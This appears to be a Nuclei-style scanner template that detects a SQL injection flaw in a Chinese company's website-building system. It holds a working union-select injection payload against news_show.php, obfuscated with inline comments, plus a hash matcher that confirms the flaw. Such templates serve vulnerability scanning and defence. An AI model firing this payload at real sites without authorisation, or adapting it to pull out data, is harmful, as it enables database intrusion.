id: delver-sqli

info:
  name: 德韵网络科技有限公司建站系统SQL注入漏洞
  author: Str1am
  severity: high
  tags: delver,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/news_show.php?id=-%27/*!union/*!select/*!1,2,3,md5(123),5,6,7,8,9,10,11,12,13,14,15*/--%20-"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b70"
        part: body
        condition: and
